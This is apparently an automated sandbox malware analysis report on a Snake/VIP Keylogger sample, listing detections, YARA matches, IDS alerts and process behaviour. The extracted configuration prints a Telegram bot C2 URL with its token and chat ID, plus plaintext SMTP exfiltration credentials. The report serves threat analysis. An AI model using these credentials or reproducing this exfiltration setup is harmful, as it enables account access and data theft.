Edit tour

Windows Analysis Report
UqdykLLTA2.exe

Overview

General Information

Sample name:	UqdykLLTA2.exe renamed because original name is a hash value
Original sample name:	f668a40ba30c3360b506cd8bab8be44d245c843fe0e7754091acb60d6f55b953.exe
Analysis ID:	1632397
MD5:	018f7641815f0fe8381cf765888ef6db
SHA1:	92d5f8372226783a82cc6da5d9cdf8898e77afeb
SHA256:	f668a40ba30c3360b506cd8bab8be44d245c843fe0e7754091acb60d6f55b953
Tags:	exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Sample uses string decryption to hide its real strings

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Uses the Telegram API (likely for C&C communication)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

UqdykLLTA2.exe (PID: 6372 cmdline: "C:\Users\user\Desktop\UqdykLLTA2.exe" MD5: 018F7641815F0FE8381CF765888EF6DB)

UqdykLLTA2.exe (PID: 5828 cmdline: "C:\Users\user\Desktop\UqdykLLTA2.exe" MD5: 018F7641815F0FE8381CF765888EF6DB)

UqdykLLTA2.exe (PID: 5880 cmdline: "C:\Users\user\Desktop\UqdykLLTA2.exe" MD5: 018F7641815F0FE8381CF765888EF6DB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-usering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Bot Token": "7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk", "Chat id": "7319393351", "Email ID": "accounts@ruchiraprinting.com", "Password": "Ruchira@PR12", "Host": "mail.ruchiraprinting.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Username": "accounts@ruchiraprinting.com", "Password": "Ruchira@PR12", "Host": "mail.ruchiraprinting.com", "Port": "587", "Token": "7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk", "Chat_id": "7319393351", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.3712524269.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.3712524269.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000002.3712524269.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.3712524269.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x26b46:$a1: get_encryptedPassword 0x26e3f:$a2: get_encryptedUsername 0x26956:$a3: get_timePasswordChanged 0x26a5f:$a4: get_passwordField 0x26b5c:$a5: set_encryptedPassword 0x28156:$a7: get_logins 0x280b9:$a10: KeyLoggerEventArgs 0x27d42:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.3716120715.00000000032E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.3716120715.00000000033E8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1275846370.0000000004E67000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1275846370.0000000004E67000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1275846370.0000000004E67000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1275846370.0000000004E67000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2740e:$a1: get_encryptedPassword 0x6142e:$a1: get_encryptedPassword 0x27707:$a2: get_encryptedUsername 0x61727:$a2: get_encryptedUsername 0x2721e:$a3: get_timePasswordChanged 0x6123e:$a3: get_timePasswordChanged 0x27327:$a4: get_passwordField 0x61347:$a4: get_passwordField 0x27424:$a5: set_encryptedPassword 0x61444:$a5: set_encryptedPassword 0x28a1e:$a7: get_logins 0x62a3e:$a7: get_logins 0x28981:$a10: KeyLoggerEventArgs 0x629a1:$a10: KeyLoggerEventArgs 0x2860a:$a11: KeyLoggerEventArgsEventHandler 0x6262a:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1275846370.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1275846370.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1275846370.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1275846370.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33305e:$a1: get_encryptedPassword 0x333357:$a2: get_encryptedUsername 0x332e6e:$a3: get_timePasswordChanged 0x332f77:$a4: get_passwordField 0x333074:$a5: set_encryptedPassword 0x33466e:$a7: get_logins 0x3345d1:$a10: KeyLoggerEventArgs 0x33425a:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: UqdykLLTA2.exe PID: 6372	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: UqdykLLTA2.exe PID: 6372	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: UqdykLLTA2.exe PID: 6372	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: UqdykLLTA2.exe PID: 6372	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: UqdykLLTA2.exe PID: 6372	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x4665f:$a1: get_encryptedPassword 0xb0b15:$a1: get_encryptedPassword 0x4694e:$a2: get_encryptedUsername 0xb0d1f:$a2: get_encryptedUsername 0x46479:$a3: get_timePasswordChanged 0xb0942:$a3: get_timePasswordChanged 0x46582:$a4: get_passwordField 0xb0a3f:$a4: get_passwordField 0x46675:$a5: set_encryptedPassword 0xb0b2b:$a5: set_encryptedPassword 0x48a3d:$a7: get_logins 0xb2985:$a7: get_logins 0x489a0:$a10: KeyLoggerEventArgs 0xb28fd:$a10: KeyLoggerEventArgs 0x4862d:$a11: KeyLoggerEventArgsEventHandler 0xb26b7:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: UqdykLLTA2.exe PID: 5880	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: UqdykLLTA2.exe PID: 5880	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: UqdykLLTA2.exe PID: 5880	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: UqdykLLTA2.exe PID: 5880	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xdf45:$a1: get_encryptedPassword 0xe234:$a2: get_encryptedUsername 0xdd5f:$a3: get_timePasswordChanged 0xde68:$a4: get_passwordField 0xdf5b:$a5: set_encryptedPassword 0x10323:$a7: get_logins 0x10286:$a10: KeyLoggerEventArgs 0xff13:$a11: KeyLoggerEventArgsEventHandler
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.UqdykLLTA2.exe.4dee318.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.UqdykLLTA2.exe.4dee318.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.UqdykLLTA2.exe.4dee318.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.UqdykLLTA2.exe.4dee318.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x24f46:$a1: get_encryptedPassword 0x2523f:$a2: get_encryptedUsername 0x24d56:$a3: get_timePasswordChanged 0x24e5f:$a4: get_passwordField 0x24f5c:$a5: set_encryptedPassword 0x26556:$a7: get_logins 0x264b9:$a10: KeyLoggerEventArgs 0x26142:$a11: KeyLoggerEventArgsEventHandler
0.2.UqdykLLTA2.exe.4dee318.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x25b08:$s1: UnHook 0x25b0f:$s2: SetHook 0x25b17:$s3: CallNextHook 0x25b24:$s4: _hook
0.2.UqdykLLTA2.exe.4e676c8.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.UqdykLLTA2.exe.4e676c8.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.UqdykLLTA2.exe.4e676c8.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.UqdykLLTA2.exe.4e676c8.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x24f46:$a1: get_encryptedPassword 0x2523f:$a2: get_encryptedUsername 0x24d56:$a3: get_timePasswordChanged 0x24e5f:$a4: get_passwordField 0x24f5c:$a5: set_encryptedPassword 0x26556:$a7: get_logins 0x264b9:$a10: KeyLoggerEventArgs 0x26142:$a11: KeyLoggerEventArgsEventHandler
0.2.UqdykLLTA2.exe.4e676c8.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x25b08:$s1: UnHook 0x25b0f:$s2: SetHook 0x25b17:$s3: CallNextHook 0x25b24:$s4: _hook
3.2.UqdykLLTA2.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.UqdykLLTA2.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.UqdykLLTA2.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.UqdykLLTA2.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x26d46:$a1: get_encryptedPassword 0x2703f:$a2: get_encryptedUsername 0x26b56:$a3: get_timePasswordChanged 0x26c5f:$a4: get_passwordField 0x26d5c:$a5: set_encryptedPassword 0x28356:$a7: get_logins 0x282b9:$a10: KeyLoggerEventArgs 0x27f42:$a11: KeyLoggerEventArgsEventHandler
3.2.UqdykLLTA2.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x27908:$s1: UnHook 0x2790f:$s2: SetHook 0x27917:$s3: CallNextHook 0x27924:$s4: _hook
0.2.UqdykLLTA2.exe.4dee318.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.UqdykLLTA2.exe.4dee318.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.UqdykLLTA2.exe.4dee318.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.UqdykLLTA2.exe.4dee318.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x26d46:$a1: get_encryptedPassword 0x2703f:$a2: get_encryptedUsername 0x26b56:$a3: get_timePasswordChanged 0x26c5f:$a4: get_passwordField 0x26d5c:$a5: set_encryptedPassword 0x28356:$a7: get_logins 0x282b9:$a10: KeyLoggerEventArgs 0x27f42:$a11: KeyLoggerEventArgsEventHandler
0.2.UqdykLLTA2.exe.4dee318.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x27908:$s1: UnHook 0x2790f:$s2: SetHook 0x27917:$s3: CallNextHook 0x27924:$s4: _hook
0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xa5566:$a1: get_encryptedPassword 0xa585f:$a2: get_encryptedUsername 0xa5376:$a3: get_timePasswordChanged 0xa547f:$a4: get_passwordField 0xa557c:$a5: set_encryptedPassword 0xa6b76:$a7: get_logins 0xa6ad9:$a10: KeyLoggerEventArgs 0xa6762:$a11: KeyLoggerEventArgsEventHandler
0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xa6128:$s1: UnHook 0xa612f:$s2: SetHook 0xa6137:$s3: CallNextHook 0xa6144:$s4: _hook
0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x123d86:$a1: get_encryptedPassword 0x12407f:$a2: get_encryptedUsername 0x123b96:$a3: get_timePasswordChanged 0x123c9f:$a4: get_passwordField 0x123d9c:$a5: set_encryptedPassword 0x125396:$a7: get_logins 0x1252f9:$a10: KeyLoggerEventArgs 0x124f82:$a11: KeyLoggerEventArgsEventHandler
0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x124948:$s1: UnHook 0x12494f:$s2: SetHook 0x124957:$s3: CallNextHook 0x124964:$s4: _hook
0.2.UqdykLLTA2.exe.4e676c8.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.UqdykLLTA2.exe.4e676c8.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.UqdykLLTA2.exe.4e676c8.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.UqdykLLTA2.exe.4e676c8.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x26d46:$a1: get_encryptedPassword 0x60d66:$a1: get_encryptedPassword 0x2703f:$a2: get_encryptedUsername 0x6105f:$a2: get_encryptedUsername 0x26b56:$a3: get_timePasswordChanged 0x60b76:$a3: get_timePasswordChanged 0x26c5f:$a4: get_passwordField 0x60c7f:$a4: get_passwordField 0x26d5c:$a5: set_encryptedPassword 0x60d7c:$a5: set_encryptedPassword 0x28356:$a7: get_logins 0x62376:$a7: get_logins 0x282b9:$a10: KeyLoggerEventArgs 0x622d9:$a10: KeyLoggerEventArgs 0x27f42:$a11: KeyLoggerEventArgsEventHandler 0x61f62:$a11: KeyLoggerEventArgsEventHandler
0.2.UqdykLLTA2.exe.4e676c8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x27908:$s1: UnHook 0x61928:$s1: UnHook 0x2790f:$s2: SetHook 0x6192f:$s2: SetHook 0x27917:$s3: CallNextHook 0x61937:$s3: CallNextHook 0x27924:$s4: _hook 0x61944:$s4: _hook
Click to see the 30 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 119.18.54.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\UqdykLLTA2.exe, Initiated: true, ProcessId: 5880, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49704

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T23:20:30.753188+0100	2803305	3	Unknown Traffic	192.168.2.6	49689	104.21.80.1	443	TCP
2025-03-07T23:20:49.829209+0100	2803305	3	Unknown Traffic	192.168.2.6	49700	104.21.80.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T23:20:25.758550+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49686	193.122.6.168	80	TCP
2025-03-07T23:20:28.509108+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49686	193.122.6.168	80	TCP
2025-03-07T23:20:31.492841+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49690	193.122.6.168	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T23:21:04.092341+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	49705	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T23:20:55.545817+0100	1810007	1	Potentially Bad Traffic	192.168.2.6	49703	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: UqdykLLTA2.exe

Avira: detected

Found malware configuration

Source: 00000003.00000002.3716120715.00000000032E1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Bot Token": "7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk", "Chat id": "7319393351", "Email ID": "accounts@ruchiraprinting.com", "Password": "Ruchira@PR12", "Host": "mail.ruchiraprinting.com", "Port": "587"}
Source: 00000003.00000002.3716120715.00000000032E1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "accounts@ruchiraprinting.com", "Password": "Ruchira@PR12", "Host": "mail.ruchiraprinting.com", "Port": "587", "Token": "7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk", "Chat_id": "7319393351", "Version": "4.4"}
Source: UqdykLLTA2.exe.5880.3.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk/sendMessage"}

Multi AV Scanner detection for submitted file

Source: UqdykLLTA2.exe	Virustotal: Detection: 80%			Perma Link
Source: UqdykLLTA2.exe	ReversingLabs: Detection: 71%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack	String decryptor: accounts@ruchiraprinting.com
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack	String decryptor: Ruchira@PR12
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack	String decryptor: mail.ruchiraprinting.com
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack	String decryptor: stefano.clemente-memoryworld@wstceh.com
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack	String decryptor: 587
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack	String decryptor: 7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack	String decryptor: 7319393351
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: UqdykLLTA2.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49687 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49703 version: TLS 1.2

Source: UqdykLLTA2.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 030EF911h	3_2_030EF650
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 030EF2EDh	3_2_030EF33C
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 030EF2EDh	3_2_030EF150
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FBC200h	3_2_06FBBF08
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB5FF9h	3_2_06FB5C88
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB7580h	3_2_06FB7288
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FBD9E8h	3_2_06FBD6F0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB51A8h	3_2_06FB4ED8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FBF1D0h	3_2_06FBEED8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB3998h	3_2_06FB36C8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB22C8h	3_2_06FB1FF8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB5AC8h	3_2_06FB57F8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB42B8h	3_2_06FB3FE8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB7A48h	3_2_06FB7750
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB9230h	3_2_06FB8F38
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FBAA18h	3_2_06FBA720
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB19B8h	3_2_06FB1710
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB07A0h	3_2_06FB04D0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB2758h	3_2_06FB2488
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB474Ah	3_2_06FB4478
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB7F10h	3_2_06FB7C18
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB96F8h	3_2_06FB9400
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB10C0h	3_2_06FB0DF0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB3078h	3_2_06FB2DA8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB88A0h	3_2_06FB85A8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FBA088h	3_2_06FB9D90
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FBB870h	3_2_06FBB578
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FBD058h	3_2_06FBCD60
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FBE840h	3_2_06FBE548
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB1550h	3_2_06FB1280
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB8D68h	3_2_06FB8A70
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FBA550h	3_2_06FBA258
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB4D18h	3_2_06FB4A48
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FBBD38h	3_2_06FBBA40
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB3508h	3_2_06FB3238
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FBD520h	3_2_06FBD228
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FBED08h	3_2_06FBEA10
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FBAEE0h	3_2_06FBABE8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FBC6C8h	3_2_06FBC3D0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FBDEB0h	3_2_06FBDBB8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FBF698h	3_2_06FBF3A0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB1E38h	3_2_06FB1B68
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB5638h	3_2_06FB5368
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB3E28h	3_2_06FB3B58
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB6BB2h	3_2_06FB6B08
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB6BB2h	3_2_06FB6B07
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB83D8h	3_2_06FB80E0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB9BC0h	3_2_06FB98C8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FBB3A8h	3_2_06FBB0B0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FBCB90h	3_2_06FBC898
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FBE378h	3_2_06FBE080
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FBFB60h	3_2_06FBF868
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB0310h	3_2_06FB0040
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB0C30h	3_2_06FB0960
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 4x nop then jmp 06FB2BE8h	3_2_06FB2918

Networking

Suricata IDS alerts for network traffic

